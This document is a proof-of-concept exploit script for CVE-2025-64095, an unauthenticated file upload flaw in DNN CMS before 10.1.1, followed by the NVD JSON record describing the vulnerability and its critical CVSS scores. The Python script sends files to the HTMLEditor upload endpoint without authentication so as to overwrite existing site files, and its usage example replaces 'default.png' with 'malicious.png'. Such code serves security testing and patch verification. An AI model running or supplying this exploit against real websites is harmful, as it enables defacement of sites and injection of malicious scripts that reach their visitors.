CVE-2025-64095

import requests import sys # CVE-2025-64095 PoC - Unauthenticated File Upload in DNN CMS # Target: DNN versions < 10.1.1 def upload_file(target_url, file_path, target_filename): """ Upload a file to DNN without authentication and attempt to overwrite existing files """ upload_url = f"{target_url}/API/HTMLEditor/upload" try: with open(file_path, 'rb') as f: files = { 'file': (target_filename, f, 'image/png') } # Send request without authentication response = requests.post(upload_url, files=files, timeout=10) if response.status_code == 200: print(f"[+] File upload successful: {target_filename}") print(f"[+] Response: {response.text}") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False except Exception as e: print(f"[-] Error: {str(e)}") return False def check_version(target_url): """ Check if target is vulnerable DNN version """ version_url = f"{target_url}/API/Common/Version" try: response = requests.get(version_url, timeout=10) if '10.1.1' not in response.text: print(f"[!] Target appears to be vulnerable") return True except: pass return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-64095.py <target_url> <file_path> <target_filename>") print("Example: python cve-2025-64095.py http://target.com malicious.png default.png") sys.exit(1) target = sys.argv[1] file_path = sys.argv[2] target_filename = sys.argv[3] print(f"[*] Testing CVE-2025-64095 on {target}") if check_version(target): upload_file(target, file_path, target_filename)

{"cve": {"id": "CVE-2025-64095", "sourceIdentifier": "[email protected]", "published": "2025-10-28T22:15:38.387", "lastModified": "2025-11-03T19:39:58.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to 10.1.1, the default HTML editor provider allows unauthenticated file uploads and images can overwrite existing files. An unauthenticated user can upload and replace existing files allowing defacing a website and combined with other issue, injection XSS payloads. This vulnerability is fixed in 10.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.1.1", "matchCriteriaId": "AADA05D8-5532-4750-85C9-7B6F25E3BFD7"}]}]}], "references": [{"url": "https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-3m8r-w7xg-jqvw", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}